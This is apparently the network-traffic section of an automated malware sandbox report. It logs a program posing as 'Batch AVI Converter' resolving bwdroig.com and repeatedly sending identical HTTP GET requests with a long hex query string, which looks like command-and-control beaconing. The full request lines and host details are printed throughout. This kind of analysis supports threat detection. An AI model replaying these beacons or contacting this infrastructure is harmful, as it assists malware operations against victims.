                                                            Sep 11, 2024 21:07:05.459860086 CEST8049762185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:05.459992886 CEST4976380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:05.460181952 CEST4976280192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:05.465070009 CEST8049763185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:06.175821066 CEST8049763185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:06.175895929 CEST4976380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.297672987 CEST4976380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.298034906 CEST4976480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.303905010 CEST8049763185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:06.303927898 CEST8049764185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:06.304008007 CEST4976480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.304009914 CEST4976380192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.304177999 CEST4976480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:07:06.309101105 CEST8049764185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:07.003262997 CEST8049764185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:07:07.004268885 CEST4976480192.168.2.5185.196.8.214

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 11, 2024 21:05:21.409257889 CEST53515901.1.1.1192.168.2.5
                                                            Sep 11, 2024 21:05:55.585160017 CEST6137053192.168.2.5141.98.234.31
                                                            Sep 11, 2024 21:05:55.823065996 CEST5361370141.98.234.31192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Sep 11, 2024 21:05:55.585160017 CEST192.168.2.5141.98.234.310xef2Standard query (0)bwdroig.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Sep 11, 2024 21:05:55.823065996 CEST141.98.234.31192.168.2.50xef2No error (0)bwdroig.com185.196.8.214A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • bwdroig.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549694185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:05:55.897671938 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:05:56.592645884 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:05:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:05:56.702069044 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:05:56.945528984 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:05:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549695185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:05:57.067815065 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:05:57.758820057 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:05:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549696185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:05:57.880429029 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:05:58.587096930 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:05:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549698185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:05:58.707561016 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:05:59.436620951 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:05:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:05:59.545393944 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:05:59.808842897 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:05:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:05:59.920454025 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:00.172555923 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549699185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:00.301341057 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:04.025146961 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549700185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:04.145266056 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:04.856555939 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:04.967935085 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:05.212599993 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549701185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:05.333175898 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:06.172828913 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549705185.196.8.21480
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:06.300848007 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:07.015593052 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.549706185.196.8.21480
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:07.145529032 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:07.862838984 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.549708185.196.8.21480
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:07.992779016 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:08.685074091 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:08.796487093 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:09.037638903 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.549710185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:09.161799908 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:09.851246119 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.549711185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:09.978030920 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:11.069535017 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.549712185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:11.199140072 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:11.896188974 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.549713185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:12.030303955 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:12.773536921 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.549714185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:12.895684004 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:13.605597019 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.549715185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:13.757467031 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:14.458170891 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.549716185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:14.584191084 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:15.308001995 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:15.422348976 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:15.657740116 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.549717185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:15.808743954 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:16.511200905 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
